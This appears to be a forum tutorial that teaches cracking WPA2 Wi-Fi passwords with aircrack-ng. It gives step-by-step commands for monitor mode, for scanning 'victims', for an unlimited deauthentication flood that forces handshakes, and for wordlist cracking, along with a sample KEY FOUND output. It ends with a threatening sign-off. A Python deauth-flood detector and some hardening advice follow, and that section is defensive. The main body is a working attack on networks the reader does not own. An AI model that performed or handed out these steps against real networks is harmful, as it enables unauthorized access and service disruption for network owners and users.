odz75
This works only on WPA2 networks (almost every network uses WPA2).
The method we will use is brute forcing.
So let's start.
Requirements:
1. aireplay-ng
2. Kali Linux
3. Airodump-ng
4. Aircrack-ng
5. A word list
6. Handshake (we will get it in this tutorial)
7. A wireless card compatible with monitor mode
0. Fire up your Kali Linux
So first, we need to find our target. The first step is to put our wireless card in monitor mode.
1. Putting the wireless card in monitor mode:
Open a console and type:
iwconfig
This command will show you your wireless cards; it should look like this:
[Screenshot: iwconfig output]
As you can see, I have the wlan0 card. Look at the mode: in my case it is Managed, so we need to change it to monitor mode using this command:
airmon-ng start wlan0
Type iwconfig again and check that your wireless card is in monitor mode. If you have done this correctly, congrats, we are now ready to scan for victims.
2. Scanning for victims
Using airodump-ng we will scan wireless networks, by running this command:
airodump-ng wlan0mon
I used wlan0mon instead of wlan0 because when we used airmon-ng to change the mode we also renamed it to wlan0mon, mon=monitor
After running the command you should see something like this:
[Screenshot: airodump-ng scan output]
Wait until you see your network, then press CTRL+C.
After you have found your network, copy the BSSID and channel and keep them.
3. Capturing the handshake
Here is the fun part: we will capture the handshake.
We will use airodump-ng to get the handshake.
First, run the following command:
airodump-ng -c <channel of target> --bssid <bssid of target> -w . wlan0mon
Replace <channel of target> with the channel
and <bssid of target> with the BSSID.
We are now listening for handshakes; we will capture one when a device connects to the network. If you are impatient, you can flood the Wi-Fi network (without being connected to it) to force devices to reconnect, using this command in another window:
aireplay-ng -0 0 -a <bssid of target> wlan0
If it doesn't work, try wlan0mon.
So let's explain the command:
-0 > means that we are making a deauth attack
0 > means that we will send infinite packets to the Wi-Fi network
-a > is the flag for the Wi-Fi network
wlan0 > is our interface; use wlan0mon in case it doesn't work.
Let the command run until you see this:
[Screenshot: airodump-ng window showing the WPA handshake notification]
As you can see, in the bigger window we have a WPA handshake notification; that means you captured the handshake!
You can find your handshake in the folder where you ran the command; it is a .cap file.
After you get the handshake, stop the aireplay-ng command using CTRL+C.
4. Cracking the password
We will use aircrack-ng, the .cap file, and a word list.
Run this command:
aircrack-ng -a2 -b <bssid of target> -w <wordlist file> <capture file>
Replace <bssid of target> with the BSSID, <wordlist file> with the word list file, and <capture file> with the capture file name.
If the password is in the word list, you will get something like this:
Aircrack-ng 1.2 beta3

[00:01:49] 111040 keys tested (1017.96 k/s)

KEY FOUND! [ password123 ]

Master Key     : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
                 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E

Transient Key  : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
                 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
                 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
                 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21

EAPOL HMAC     : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
Congrats! You cracked the password
TOOK ME LIKE 30 MINS TO WRITE THIS, SHOW APPRECIATION OR I WILL REPORT YOU AND YOU WILL GET BANNED
Leechers will be Fired in the World War III
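Seen from the network owner's side, the deauth flood in step 3 is the noisiest part of this procedure and the easiest to detect. The following is an added example, not part of the original post: a sliding-window detector that flags a BSSID receiving a burst of deauthentication/disassociation frames. The record format, MAC addresses, window and threshold are all constructed assumptions, not the output of any real tool.

```python
from collections import defaultdict, deque

DEAUTH, DISASSOC = 0x0C, 0x0A        # 802.11 management frame subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"

def build_sample():
    """Constructed sensor records: '<seconds> <subtype> <src> <dst> <bssid>'.
    The format and the MAC addresses are made up for this example."""
    ap, sta = "02:00:00:aa:bb:01", "02:00:00:cc:dd:02"
    lines = [f"0.50 0x0c {sta} {ap} {ap}"]                 # one normal client leave
    lines += [f"{10 + i * 0.01:.2f} 0x0c {ap} {BROADCAST} {ap}"
              for i in range(200)]                         # burst of broadcast deauths
    lines.append(f"30.00 0x0a {ap} {sta} 02:00:00:ee:ff:03")  # unrelated network
    return lines

def parse(line):
    ts, subtype, src, dst, bssid = line.split()
    return float(ts), int(subtype, 16), src.lower(), dst.lower(), bssid.lower()

def detect_deauth_floods(lines, window=1.0, threshold=20):
    """Return {bssid: stats} for every BSSID that saw at least `threshold`
    deauth/disassoc frames inside any `window`-second span."""
    recent = defaultdict(deque)      # bssid -> timestamps still inside the window
    stats = defaultdict(lambda: {"peak": 0, "broadcast": 0, "first_burst": None})
    for ts, subtype, _src, dst, bssid in sorted(map(parse, lines)):
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window:    # drop frames older than the window
            q.popleft()
        s = stats[bssid]
        s["peak"] = max(s["peak"], len(q))
        s["broadcast"] += dst == BROADCAST   # broadcast deauths hit every client
        if s["first_burst"] is None and len(q) >= threshold:
            s["first_burst"] = q[0]          # when the burst began
    return {b: s for b, s in stats.items() if s["first_burst"] is not None}

if __name__ == "__main__":
    for bssid, s in detect_deauth_floods(build_sample()).items():
        print(f"ALERT {bssid}: burst from t={s['first_burst']}s, "
              f"peak {s['peak']} frames/window, {s['broadcast']} to broadcast")
```

Enabling 802.11w Protected Management Frames (mandatory in WPA3) makes clients discard forged deauthentication frames, and a long random passphrase that appears in no word list defeats step 4 even if a handshake is captured.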